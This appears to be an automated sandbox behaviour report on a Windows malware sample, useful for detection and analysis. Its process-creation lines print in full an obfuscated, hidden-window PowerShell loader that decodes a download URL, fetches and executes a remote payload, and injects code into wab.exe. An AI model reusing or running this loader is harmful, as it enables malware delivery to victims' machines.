        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 24C0000 memory reserve | memory write watchJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 20F50000 memory reserve | memory write watchJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 20E10000 memory reserve | memory write watchJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4774Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5102Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5870Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3903Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 2282Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 7535Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2964Thread sleep time: -9223372036854770s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2300Thread sleep count: 5870 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3116Thread sleep count: 3903 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4676Thread sleep time: -3689348814741908s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5532Thread sleep time: -23980767295822402s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5396Thread sleep count: 2282 > 30Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5396Thread sleep count: 7535 > 30Jump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Program Files (x86)\Windows Mail\wab.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: wab.exe, 00000009.00000002.3240609884.00000000053C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWhuB
        Source: wab.exe, 00000009.00000002.3240674366.000000000541F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2790829519.000000000541F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: powershell.exe, 00000003.00000002.2611000081.0000027AF1BC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWVe%SystemRoot%\system32\mswsock.dllea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0248D01C LdrInitializeThunk,9_2_0248D01C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Yara detected Powershell download and execute
        Source: Yara matchFile source: amsi64_6100.amsi.csv, type: OTHER
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6100, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7056, type: MEMORYSTR
        Writes to foreign memory regions
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3760000Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 24CFF00Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0 yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ gejrBTriano.enkrnUaf jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223 ($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren. D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oeB.pappVakkeuTakstdSublueJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Preaffirmative.Spo && echo t"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0 yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ gejrBTriano.enkrnUaf jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223 ($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren. D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oeJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Preaffirmative.Spo && echo t"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$vanddraabes = 1;$precautioning='sub';$precautioning+='strin';$precautioning+='g';function forfladigelsens($tusmrkets152){$tsp=$tusmrkets152.length-$vanddraabes;for($velours=5;$velours -lt $tsp;$velours+=6){$ventin+=$tusmrkets152.$precautioning.invoke( $velours, $vanddraabes);}$ventin;}function inddatafiler223($dorathea){. ($rull) ($dorathea);}$gianthood=forfladigelsens ' ame.mbirtho terszunchaienepilsynkrlreassagasco/ pan,5gub.e. stat0sjlen stab,(tilh,wgod eivilstn kompd undeosalpiwh lhes symp g njansp,citream. maal1genne0matem.euro,0 norm;hed,s hjnelw iegfipneu n opfl6preim4induk;cleis unc,nxdecon6 glob4unbra;stutt krsenr.ybbjvmatri:tende1f rku2 lejl1under.impu.0gy,ur)ordre redepgrela.estaalc rofokb,nhao cart/cy ni2.ubdi0ag ic1.emix0re.ie0myrmi1under0 yndi1 lyst anticf unshisylphrur.nvephotof te to akkox stup/pleje1 purc2 cela1ko,me.enarb0,orca ';$varmepudes=forfladigelsens ' ammeudelitswatere.ejdsrdemon- unrealeap ghennee ultrnirreftlandb ';$radernes=forfladigelsens 'spildhkrsustsotadtpreinp ,lamstillb:satis/ gust/shamew mergwhierowgend..scia s resyereinfn indkdqueevsddsdope cepaevangcgyptoeernri.offercunf.ioov.rbmbrugs/vandepunf lrlsri.osubst/censud prehl.arak/mccar7linalyrdkriiunpe,2se,vif dewwu ety ';$koglespillets=forfladigelsens 'flyvn>overb ';$rull=forfladigelsens 'k emsitvillecampbxmodul ';$hvervende='limpindene';$bondages = forfladigelsens 'forvae,uculcpredohmar,no stan hande%hvidvatrio,pcampsp unt dwhupoa ,ntetsprudahyper% ieth\te,tipanstrrrestaetysseasyconfnyklaf fdeaisecanroksekmpicayab,saat tubeiattrivmunkeemadag.overcsundepplapidok.pit dulge&dimme& betu aabene violcsaumohzenogoch,pp godl,tryota ';inddatafiler223 (forfladigelsens 'ant a$sandwgfac,il,rojeo anaabtrskeabilfrl nons:chl,rt un,erejakuoved ummissolmatche u.dencircudl.lyaeopsam= ufor(b.ligcsmudsmfortidbalka oligo/skri.c ,ype krysa$ gejrbtriano.enkrnuaf jdsiph.aaltingaegeregenfosflip,)densi ');inddatafiler223 (forfladigelsens ' ena $f ralgforlalstenlobryggb nonea un,tlhokus:ranomu udenncreatf udmuoudr drdiatoke,dkkep,eendnmousnaz,cyesaftfsv.llass.ces= a.pr$hasperfj.rnaslui.d kommeund,frfillin tubie sttts afde.unhelsmn.dep ano ltilreic rpotreflu(orgia$ stjekcorreosyningkateglbade elavtrsapporpr.turihydrolherrel ,apoeexemptinrolsdinos)a ato ');$radernes=$unforkedness[0];$yojuane= (forfladigelsens '.irma$dissogindfjl bordoforfebunconadonn lceleb:indicsbyggem banipbilleic.alish.rsktun.eromar,il .etrequi krpres.nboha.ek,rne=,larmnnona,ecosufwshort-criolokarspb hebejoverde troccsner,t rypt stagns r,vaysepa sb.idgt xyloebinnomgymno.rekvinnoc aekajentresub.niveawdentierandsb 